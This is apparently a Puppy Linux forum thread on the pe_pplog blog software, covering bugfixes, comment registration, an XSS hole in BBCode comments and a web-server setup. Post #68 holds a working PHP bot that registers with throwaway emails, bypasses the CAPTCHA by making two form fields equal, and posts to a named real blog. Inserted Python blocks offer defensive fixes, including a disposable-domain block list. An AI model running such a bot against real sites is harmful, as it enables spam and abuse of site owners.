pe_pplog v2.1b bugfixes!

efiabruni
Posts: 69
Joined: Tue 18 Oct 2011, 15:55

true

#61 Post by efiabruni »

will do that once I'm back from travelling

until then, all the other bugfixes and features I described are in v2.1b.

I also put the blog up on github (username: efiabruni) feel free to play around :) I'll be camping in Patagonia :D

efiabruni
Posts: 69
Joined: Tue 18 Oct 2011, 15:55

changes on github

#62 Post by efiabruni »

The last four days I spent on a ferry and had time to play with the pplog.
I made the following changes in the pe_pplog on github:

Added comment preview option for the admin page
Added the preview comment button on the preview comment page (now comment can be previewed again and again and again)
Added a check for double posts of comments

Changed files are: Pe_pplog.pl; pe_admin.pl and pe_Config.pl

BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia

#63 Post by BarryK »

efia,
I would appreciate your suggestions about what I should do.

I have been forced to disable comments on my blog, as someone has persisted in posting pornography comments.

I have been deleting them, but the person is persisting in posting more.

I was wondering how difficult it would be to implement email verification to register to post.

One way it could work, is when a user wants to post a comment, they first have to click a "Register" link. They provide their email address, to which their desired username and password are sent.

A log can be kept of usernames and email addresses, and the banning system can be expanded to ban users based on their email address.

Perhaps there are other ways of doing it.
https://bkhome.org/news/

anikin
Posts: 994
Joined: Thu 10 May 2012, 06:16

#64 Post by anikin »

Barry wrote: Due to the moron named "Author", I have been forced to disable comments
That moron has many names: 'mafur', 'simargl13', 'simargl29', etc. He posted spam and porn on this forum too. Looks like he has a severe mental pathology and needs urgent medical attention.

efiabruni
Posts: 69
Joined: Tue 18 Oct 2011, 15:55

#65 Post by efiabruni »

Some people are depressingly destructive. I'm on holiday at the moment, but will look into it once I'm home. If someone has ideas, feel free to fork the blog on github!

efiabruni
Posts: 69
Joined: Tue 18 Oct 2011, 15:55

branching out

#66 Post by efiabruni »

I created a branch called comment_registration on github.
In this I changed the pe_pplog.pl file to:
not accept comments from unregistered users
send a new mail with registration request to the admin if a new user tries to post

The admin has to manually edit the useres.ppl.data file. The syntax is: username'encrypted password"username2'encrypted password2"...

This is a quick & ugly fix.

efiabruni
Posts: 69
Joined: Tue 18 Oct 2011, 15:55

comment registration

#67 Post by efiabruni »

I have updated the branch comment_registration on https://github.com/efiabruni/pe_pplog to make it possible for users to register and for the admin to block users.

I could not test it thoroughly as I don't have sendmail or similar. I use a simple regEx for email validation, this is not the most secure way to use sendmail, please use with care.

This will not be part of the official pe_pplog

gungsukma
Posts: 19
Joined: Mon 19 Sep 2011, 02:59

#68 Post by gungsukma »


I am bot   Posted on 7 Feb 2014, 12:09 by x6255
Barry should use REAL CAPTCHA.
I'm the one posted that on http://bkhome.org/news/?viewDetailed=00055

This is the script I have used (I used PHP, but it will be easy to convert to another language).


<?php
set_time_limit(100);

// Random username
$random = 'x'.rand(1000, 9999);
echo "Your username: $random<br/>";

// Make email address
file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
echo "Your email: $random@opentrashbox.org<br/>";

// Register to Barry's blog, Wait for email
file_get_contents("http://bkhome.org/news/?do=register&username=$random&email=$random@opentrashbox.org&originalCode=AAAAAAAA&code=AAAAAAAA&process=register&Submit=Register");
sleep(30);

// Read inbox, Get the password
$contents = file_get_contents("http://opentrashbox.org/mailbox.php?email=$random");
preg_match("/password:\s*(\d+)/", $contents, $match);
$password = $match[1];
echo "Your password: $password<br/>";

// Add comment
file_get_contents("http://bkhome.org/news/?viewDetailed=00055&title=I+am+bot&author=$random&content=Barry+should+use+REAL+CAPTCHA.&originalCode=9999999&code=9999999&pass=$password&postTitle=Comments+are+back&sendComment=00055&Submit=Add+Comment");
echo "Barry should use *real captcha*.<br/>";

With that script, I can make and register random username and random email address. Someone blocks one, I'll make one (thanks, OpenTrashBox.org!).

But the one thing I want to show is the Security Code, you can trick it!
On the script, I don't even bother to read the security code, I just need to change the value of form element originalCode and code, then I can bypass the security code. These parts:
> originalCode=AAAAAAAA&code=AAAAAAAA
> originalCode=9999999&code=9999999

This is my suggestion:
- Just accept email register from GMail.com and Yahoo.com or any reputable email service
- Check the pattern of username of email address, just accept alphanumeric, dots, and underscore.
- For GMail, remove all dots and label in the email username (gungsukma@gmail.com, g.ung.suk.ma@gmail.com, gungsukma+bla.bla@gmail.com are all the same user).
- Use REAL CAPTCHA when register and add comment
- Disable the comment on the blog now, I have leaked the bot source code. :twisted:

Oh, "gungsukma@gmail.com" is not mine
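Two of the defences this post argues for, as an added example (Python rather than pe_pplog's Perl, and not code from the project): the CAPTCHA answer is kept server-side under a single-use token instead of being echoed back in the form, and e-mail addresses are normalised (Gmail dots and +labels folded, local part restricted to alphanumerics, dots and underscore) and checked against a constructed disposable-domain block list before they are compared or banned.

```python
import re
import secrets

# Added example, not pe_pplog's code.
# --- (1) CAPTCHA ------------------------------------------------------------
# Constructed in-memory store; a CGI would persist this (file or session store).
_pending_captchas = {}


def captcha_check_flawed(original_code, code):
    """The pattern the bot abuses: both values come from the form, so the
    client simply sends the same string twice (AAAAAAAA / AAAAAAAA)."""
    return original_code == code


def issue_captcha():
    """Create a challenge. The form carries only the opaque token; the code
    is rendered as an image and is never sent to the client as a field."""
    token = secrets.token_hex(8)
    code = "".join(secrets.choice("ABCDEFGHJKMNPQRSTUVWXYZ23456789") for _ in range(6))
    _pending_captchas[token] = code
    return token, code


def captcha_check(token, answer):
    """Compare the answer with the stored code; each token is single-use."""
    expected = _pending_captchas.pop(token, None)
    if expected is None or not isinstance(answer, str):
        return False
    return secrets.compare_digest(expected.encode(), answer.strip().upper().encode())


# --- (2) e-mail normalisation ----------------------------------------------
_LOCAL_RE = re.compile(r"[a-z0-9._]+")      # alphanumerics, dots, underscore only
_GMAIL = {"gmail.com", "googlemail.com"}    # dots and +labels are ignored there
_BLOCKED_DOMAINS = {"opentrashbox.org"}     # constructed disposable-mail block list


def normalize_email(addr):
    """Return the canonical address, or None if it must be rejected."""
    addr = addr.strip().lower()
    if addr.count("@") != 1:
        return None
    local, domain = addr.split("@")
    if domain in _BLOCKED_DOMAINS:
        return None
    if domain in _GMAIL:
        local = local.split("+", 1)[0].replace(".", "")
    if not _LOCAL_RE.fullmatch(local):
        return None
    return f"{local}@{domain}"
```

Bans and duplicate checks should be keyed on the value normalize_email returns, not on the address as typed.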

efiabruni
Posts: 69
Joined: Tue 18 Oct 2011, 15:55

re: bots

#69 Post by efiabruni »

I am aware that the captcha is suboptimal, therefore there is also the "security question" option, which does not suffer from the same vulnerability and could even be set as a password.

Changes to comment_registration:
added disposable email services to block list by default
stricter rules for email validation

Comment registration is never going to be an official feature, if someone feels like playing around with it, the code is on github on the branch comment_registration.
I simply do not have enough interest in this particular problem to muck around with it. I'd rather create galleries and css animations and stuff :)

Again, the easiest and safest way is to use the security question as a password and only give the answer to people you trust. If it is broken into, change it.

Also, before someone got a personal grudge and went out of his way to post spam, no bot got past the former security features of the pplog for the past 2 years that I have been using it, nor was it a problem for Barry until now.

efiabruni
Posts: 69
Joined: Tue 18 Oct 2011, 15:55

security issue

#70 Post by efiabruni »

There is a security issue with having bbcode enabled in comments in all the pplogs (original, SJPPlog and this one).

Due to very permissive parsing of the bbcode it is possible to insert javascript in comments when posting a link or a picture.
See http://tine.pagekite.me/pe_pplog.pl/?viewDetailed=00047 for an example. This makes comments vulnerable to xss attacks.

My advice is to disable bbcode on the comments of ALL versions of the PPLOG.

What is needed:
URL / SRC validating and escaping
strict rules for which attributes are allowed, validating and escaping
additional html escaping

I will fix this properly in the coming weeks
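The three items listed above (URL/SRC validation and escaping, a strict rule for what an attribute may contain, and HTML escaping of everything else), as an added example in Python that is not pe_pplog's code: the comment is HTML-escaped first, and only [url=...] and [img] tags whose address validates as http(s) are expanded; everything else stays inert text.

```python
import html
import re
from urllib.parse import urlsplit

# Added example, not pe_pplog's code.
ALLOWED_SCHEMES = {"http", "https"}

# Tag patterns are applied to text that has ALREADY been HTML-escaped.
_URL_TAG = re.compile(r"\[url=([^\]]+)\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)
_IMG_TAG = re.compile(r"\[img\]([^\[]+)\[/img\]", re.IGNORECASE)


def safe_href(raw):
    """Return an escaped http(s) URL, or None if it must not be emitted."""
    raw = raw.strip()
    # Quotes and angle brackets would break out of the attribute; control
    # characters and spaces defeat scheme checks (e.g. "java\tscript:").
    if re.search(r'["\'<>\x00-\x20]', raw):
        return None
    try:
        parts = urlsplit(raw)
    except ValueError:          # malformed netloc such as an unclosed "["
        return None
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return html.escape(raw, quote=True)


def render_comment(text):
    """Escape everything first, then expand only tags whose URL validates."""
    escaped = html.escape(text, quote=True)

    def url_repl(m):
        href = safe_href(html.unescape(m.group(1)))
        if href is None:        # bad link: keep the visible text, drop the tag
            return m.group(2)
        return f'<a href="{href}" rel="nofollow">{m.group(2)}</a>'

    def img_repl(m):
        src = safe_href(html.unescape(m.group(1)))
        return f'<img src="{src}" alt="">' if src else "[image removed]"

    return _IMG_TAG.sub(img_repl, _URL_TAG.sub(url_repl, escaped))
```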

pagestep007
Posts: 37
Joined: Tue 13 Jan 2015, 15:20
Location: colombia

pe_pplog v2.1b

#71 Post by pagestep007 »

Hi,
I am trying out the slacko6.3 64 bit version puppy. Noticed it did not have pplog, then tried all sorts of things; the pe_pplog on this thread I managed to get working on the 32 bit slacko6.3, but....not on the 64 bit. I notice this thread's last entry was 2014. Maybe the program has not been upgraded ...is pe_pplog 64 bit compatible?
Thanks.

OscarTalks
Posts: 2196
Joined: Mon 06 Feb 2012, 00:58
Location: London, England

#72 Post by OscarTalks »

I looked into this and the problem seems to be that hiawatha in Slacko64 is reading the config file in /usr/etc/hiawatha rather than the one in /etc/hiawatha
See this post:-
http://murga-linux.com/puppy/viewtopic. ... 9&start=10
So long as you are aware of this you can configure it and get it working.
Oscar in England

pagestep007
Posts: 37
Joined: Tue 13 Jan 2015, 15:20
Location: colombia

pe_pplog v2.1b bugfixes!

#73 Post by pagestep007 »

EXCELLENT ! Thank you.
I installed pplog- 1.1.3.pet and then pasted the following into the config file in usr/etc/hiawatha, and it all suddenly worked.

ServerId = webuser
ConnectionsTotal = 150
ConnectionsPerIP = 10
SystemLogfile = /var/log/hiawatha/system.log
GarbageLogfile = /var/log/hiawatha/garbage.log

Binding {
Port = 80
# Interface = 127.0.0.1
}
Hostname = 127.0.0.1
WebsiteRoot = /root/Web-Server
StartFile = index.html
AccessLogfile = /var/log/hiawatha/access.log
ErrorLogfile = /var/log/hiawatha/error.log

#add this stuff to get a perl script working (pplog)...
#QUISP has a binary executable CGI named 'quisp.bin'...
MimetypeConfig = /etc/mime.types
#CGIhandler = /usr/bin/perl:pl
CGIextension = pl,bin
ExecuteCGI = yes
#QUISP puts %0D, %0A (carriage-return, line-feed) chars in the url
#(v128), to allow chars below ascii 32 need this...
SecureURL = no

I did not get any joy yet with pe_pplog nor sjpplog but will give them a go. I like pup_pplog, as it has the menu entry and starts Hiawatha from there. Thank you once again.

OscarTalks
Posts: 2196
Joined: Mon 06 Feb 2012, 00:58
Location: London, England

Re: pe_pplog v2.1b bugfixes!

#74 Post by OscarTalks »

pagestep007 wrote: I did not get any joy yet with pe_pplog nor sjpplog but will give them a go. I like pup_pplog, as it has the menu entry and starts Hiawatha from there.
If you have the original pup_pplog installed and working you can easily substitute pe_pplog (which I presume is more advanced).

Install the .pet from the first post of this thread (hiawatha version of course).
Locate the file /usr/sbin/pplog_gui
Right click and open it as text.
Edit the line near the bottom so it reads:-
exec defaulthtmlviewer http://127.0.0.1:80/pe_pplog.pl
(the original line would be exec defaulthtmlviewer http://127.0.0.1:80/blog/pup_pplog.pl)
Save and close
The usual menu entry will then start and stop hiawatha as before
but the pplog button will launch pe_pplog instead of pup_pplog
Attachment: pe_pplog-wheezy.jpg (Easy substitution of pe_pplog in place of pup_pplog)
Oscar in England

pagestep007
Posts: 37
Joined: Tue 13 Jan 2015, 15:20
Location: colombia

pe_pplog v2.1b bugfixes

#75 Post by pagestep007 »

YES INDEED, it worked wonderfully. Thank you.
As I am still on a fresh live CD, remastered onto a USB memory stick, I needed to first install pup_pplog, then do the config substitution to get pup_pplog going, then changed the /usr/sbin/pplog_gui as you instructed. Works well. I will now remaster to another USB.

(a big thank you to all puppy people --maybe not the right thread to write in but ...)
By the way... I am a TV and Cine producer. My entire pipeline can be done from my slacko5.7 32 bit CD, with a combo of open source programs on it. I can use it right from the disk anywhere on any machine. A few extra programs are stored elsewhere handy to install quickly when needed. The great thing is Puppy does not hog resources and just about everything goes to getting work done. I am using Pentium 4 comps, and some laptops to render on, with the fastest comp a duo core, and with Puppy, even 4K video is possible on these old machines. Blender 2.76b works faster on the 64 bit puppy, so now I am using the slacko6.3 64bit version for special effects processing. Not all my combo of programs work on the 64 bit system, but we will chip away at that one. (the 32 bit combo took about a year to get working well). So a HUGE thanks to all puppy people for your help in keeping us working. Kudos to you all.
